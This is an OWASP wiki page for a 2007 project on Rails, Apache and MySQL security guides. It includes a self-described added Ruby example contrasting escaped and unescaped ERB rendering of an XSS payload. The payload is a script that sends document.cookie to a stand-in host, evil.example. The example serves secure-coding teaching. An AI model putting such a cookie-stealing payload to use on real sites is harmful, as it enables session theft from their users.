Difference between revisions of "SpoC 007 - Web Application Security put into practice"
Revision as of 09:58, 14 July 2007
AoC Candidate: Heiko
Project coordinator: Dinis Cruz
Project Progress: 60% Complete, Progress Page
Heiko - Web Application Security put into practice
This project is about web application security put into practice, because I understand that clear examples in the specific programming language, together with explained best practices, educate best.
The Ruby on Rails Security project (http://www.rorsecurity.info/) started this year and is the only security initiative for Ruby on Rails. Ruby is the fastest growing level A programming language according to the Tiobe programming community index (http://www.tiobe.com/tpci.htm), partly because of its advertised simplicity. This is dangerous, as programmers could be enticed into cargo cult programming (http://en.wikipedia.org/wiki/Cargo_cult_programming) without knowing the security impacts. I found several security holes in popular modules, and even the Rails framework itself generates potentially insecure code. Nevertheless, Rails provides good means against many of the OWASP Top Ten security flaws, but I believe these means have to be popularized much more.
Objectives
- Create a security guide to the most popular web server software, Apache
- Create a security guide to the popular database software, MySQL
- Ruby on Rails security guide and code examples for each of the OWASP Top Ten
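As an added example of the kind of per-flaw code sample the third objective describes (this is not code from the page, the Rails framework or the Ruby on Rails Security project), here is the OWASP Top Ten cross-site scripting case in plain Ruby: a constructed attacker comment, an ERB template that interpolates it verbatim, and the same template hardened with h(). h() is the escaping helper from Ruby's standard ERB::Util module, the same helper Rails views expose as h(); Rails releases of that era (before 3.0) did not escape <%= %> output automatically, so leaving h() out is the mistake a generated or hand-written view would make. The input string and the page fragment are constructed for the example.

```ruby
# Added example, not part of the original page or the Rails project.
# The same ERB view rendered with and without escaping of user input.
require 'erb'

# ERB::Util#h is the stdlib escaping helper; including it here gives our
# templates the same h() that a Rails view of the period had available.
include ERB::Util

# Constructed sample input: a comment an attacker submitted through a form.
EVIL_COMMENT = %q{<script>document.location='http://evil.example/?c='+document.cookie</script>}

# Vulnerable view fragment: the comment body is interpolated verbatim,
# so the browser executes whatever script the attacker stored.
UNSAFE_TEMPLATE = ERB.new('<p class="comment"><%= body %></p>')

# Hardened view fragment: every untrusted value passes through h(), which
# turns <, >, &, " and ' into HTML entities before they reach the browser.
SAFE_TEMPLATE = ERB.new('<p class="comment"><%= h(body) %></p>')

def render_unsafe(body)
  UNSAFE_TEMPLATE.result(binding)
end

def render_safe(body)
  SAFE_TEMPLATE.result(binding)
end

# A check a reviewer or a test suite can run over rendered output:
# does a raw <script tag survive in the page?
def contains_script_tag?(html)
  html.downcase.include?('<script')
end

if __FILE__ == $0
  puts 'without h():'
  puts render_unsafe(EVIL_COMMENT)
  puts 'with h():'
  puts render_safe(EVIL_COMMENT)
end
```

Running the file prints the two renderings side by side; the unescaped one contains a live <script> element, the escaped one contains only &lt;script&gt; text, and contains_script_tag? distinguishes the two mechanically.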
Spring Of Code 007
This project was selected for the Spring of Code 007 (http://www.owasp.org/index.php/OWASP_Spring_Of_Code_2007_Applications#Heiko_-_Web_Application_Security_put_into_practice).
Progress
- Apache Guide (done)
- MySQL Guide (done)
- Ruby On Rails Guide (on the way)
Resources
- The Ruby on Rails Security project (http://www.rorsecurity.info/)